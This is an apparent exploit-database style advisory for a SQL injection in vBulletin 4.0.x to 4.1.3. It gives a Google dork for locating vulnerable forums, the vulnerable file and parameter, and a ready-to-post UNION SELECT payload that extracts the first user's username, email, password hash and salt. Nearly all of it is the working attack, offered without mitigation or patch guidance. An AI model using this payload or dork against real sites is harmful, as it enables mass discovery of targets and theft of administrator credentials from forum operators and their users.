Vbulletin 4.0.x => 4.1.3 - SQL
Google Dork: intitle: powered by Vbulletin 4

Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

by FB1H2S